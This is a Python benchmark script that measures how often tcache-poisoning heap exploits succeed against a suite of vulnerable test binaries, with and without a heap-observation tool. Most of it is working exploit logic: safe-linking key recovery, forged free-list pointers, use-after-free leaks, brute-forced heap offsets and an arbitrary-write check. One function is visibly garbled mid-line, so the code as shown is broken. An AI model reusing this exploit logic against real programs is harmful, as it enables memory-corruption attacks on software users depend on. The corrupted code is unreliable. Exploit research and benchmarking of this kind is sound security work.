#!/usr/bin/env python3 """ same_session_benchmark.py — The correct benchmark. Both approaches run in the SAME process session: A: heaptrm session — observe addresses, compute exploit, execute in same session B: blind session — same binary, same protocol, but no heap observation This tests: does structured heap observation enable exploitation that's otherwise impossible? No LLM needed — the exploit logic is deterministic given the addresses. The question is purely: can we GET the addresses? """ import subprocess import json import struct import os from pathlib import Path from collections import defaultdict ROOT = Path(__file__).parent.parent SUITE = ROOT / "cve_tests" / "suite" HEAPTRM = str(ROOT / "heaptrm-cli" / "target" / "release" / "heaptrm") TRIALS = 10 def heaptrm_session(binary: str, sc: int) -> bool: """Single heaptrm session: observe + exploit in same process.""" proc = subprocess.Popen( [HEAPTRM, binary], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, text=True ) def cmd(action, data=""): proc.stdin.write(json.dumps({"action": action, "data": data}) + "\n") proc.stdin.flush() line = proc.stdout.readline() return json.loads(line) if line.strip() else {} try: # Setup: alloc 3, free 2 cmd("send", f"1 0 {sc}\n") cmd("send", f"1 1 {sc}\n") cmd("send", f"1 2 {sc}\n") cmd("send", "4 0\n") cmd("send", "4 1\n") # OBSERVE — this is what heaptrm provides r = cmd("observe") if not r.get("heap"): cmd("quit"); return False chunks = r["heap"]["chunks"] freed = sorted([c for c in chunks if c["state"] == "freed"], key=lambda c: int(c["address"], 16)) allocated = sorted([c for c in chunks if c["state"] == "allocated"], key=lambda c: int(c["address"], 16)) if len(freed) < 2 or not allocated: cmd("quit"); return False # COMPUTE — deterministic given addresses chunk1_addr = int(freed[-1]["address"], 16) target_addr = int(allocated[-1]["address"], 16) xor_key = chunk1_addr >> 12 poisoned = target_addr ^ xor_key fd_hex = struct.pack("= 0 except Exception: pass finally: try: proc.kill(); proc.wait(timeout=2) except: pass return False def blind_session(binary: str, sc: int, config: dict) -> bool: """Same process, but no heap observation. Uses only binary output.""" from pwn import process as pwn_process, p64, context context.log_level = "error" p = pwn_process(binary) try: def do(cmd): p.sendline(cmd.encode()) return p.recvline(timeout=1).strip() r0 = do(f"1 0 {sc}") r1 = do(f"1 1 {sc}") r2 = do(f"1 2 {sc}") do("4 0") do("4 1") # Try to extract info from binary output addr0 = addr1 = addr2 = None leaked_fd = None # Check for address leaks in alloc output for r, name in [(r0, "0"), (r1, "1"), (r2, "2")]: if r and b"0x" in r: try: a = int(r.split(b"0x")[1].split()[0], 16) if name == "0": addr0 = a elif name == "1": addr1 = a elif name == "2": addr2 = a except: pass # Try UAF read p.sendline(f"3 1".encode()) leak = p.recvline(timeout=1).strip() if leak and leak != b"DELETED" and leak != b"ERR" and len(leak) >= 16: try: leaked_fd = int(leak[:16], 16) except: pass # Compute based on available info poisoned = None if addr1 and addr2: poisoned = addr2 ^ (addr1 >> 12) elif leaked_fd and not addr1: # Decrypt fd with guessed key key = 0x555555559 decrypted = leaked_fd ^ key if 0x555555550000 < decrypted < 0x555555570000: target = decrypted + 0xa0 poisoned = target ^ key elif addr0 and not addr1 and not addr2: # Only first address — guess offsets addr1_guess = addr0 + 0x50 addr2_guess = addr0 + 0xa0 poisoned = addr2_guess ^ (addr1_guess >> 12) if poisoned is None: # Pure blind — try common offsets base = 0x555555559000 for off in [0x2a0, 0x300, 0x350, 0x400, 0x450, 0x500, 0x550, 0x600, 0x650, 0x700]: c1 = base + off + 0x50 tgt = c1 + 0x50 test_poison = tgt ^ (c1 >> 12) do(f"2 1 {p64(test_poison).hex()[:16]}") do(f"1 3 {sc}") do(f"1 4 {sc}") do("2 4 50574e454421210a") result = do("3 2") if b"50574e4544" in result: p.close() return True # Wrong — must restart (tcache corrupted) p.close() return False do(f"2 1 {p64(poisoned).hex()[:16]}") do(f"1 3 {sc}") do(f"1 4 {sc}") do("2 4 50574e454421210a") result = do("3 2") p.close() return b"50574e4544" in result except: try: p.close() except: pass return False def main(): manifest = json.loads((SUITE / "manifest.json").read_text()) print("=" * 80) print("SAME-SESSION BENCHMARK: heaptrm vs blind (same process)") print(f"{len(manifest)} challenges × {TRIALS} trials") print("=" * 80) by_diff = defaultdict(lambda: {"ht": 0, "bl": 0, "n": 0}) all_results = [] for config in manifest: name = config["name"] binary = str(SUITE / name) if not Path(binary).exists(): continue sc = 1 ht = bl = 0 for _ in range(TRIALS): if heaptrm_session(binary, sc): ht += 1 if blind_session(binary, sc, config): bl += 1 diff = config["difficulty"] by_diff[diff]["ht"] += ht by_diff[diff]["bl"] += bl by_diff[diff]["n"] += TRIALS delta = ht - bl marker = ">>>" if delta > TRIALS//2 else ">" if delta > 0 else "==" if delta == 0 else "<" info = f"leak={config['addr_leak']:7s} uaf={str(config['uaf_read']):5s} noise={config['noise_min']}-{config['noise_max']}" print(f" {name} [{diff:8s}] ht={ht:2d}/{TRIALS} bl={bl:2d}/{TRIALS} {marker:3s} | {info}") all_results.append({ "name": name, "difficulty": diff, "heaptrm": ht, "blind": bl, "trials": TRIALS, **{k: config[k] for k in ["uaf_read", "addr_leak", "noise_min", "noise_max"]} }) print("\n" + "=" * 80) print(f"{'Difficulty':10s} {'heaptrm':>10s} {'blind':>10s} {'delta':>8s}") for diff in ["easy", "medium", "hard", "extreme"]: d = by_diff[diff] if d["n"] == 0: continue ht_pct = d["ht"] / d["n"] * 100 bl_pct = d["bl"] / d["n"] * 100 print(f"{diff:10s} {ht_pct:9.0f}% {bl_pct:9.0f}% {ht_pct-bl_pct:+7.0f}%") total_ht = sum(d["ht"] for d in by_diff.values()) total_bl = sum(d["bl"] for d in by_diff.values()) total_n = sum(d["n"] for d in by_diff.values()) print(f"{'OVERALL':10s} {total_ht/total_n*100:9.0f}% {total_bl/total_n*100:9.0f}% {(total_ht-total_bl)/total_n*100:+7.0f}%") Path("bench").mkdir(exist_ok=True) with open("bench/same_session_results.json", "w") as f: json.dump(all_results, f, indent=2) if __name__ == "__main__": main()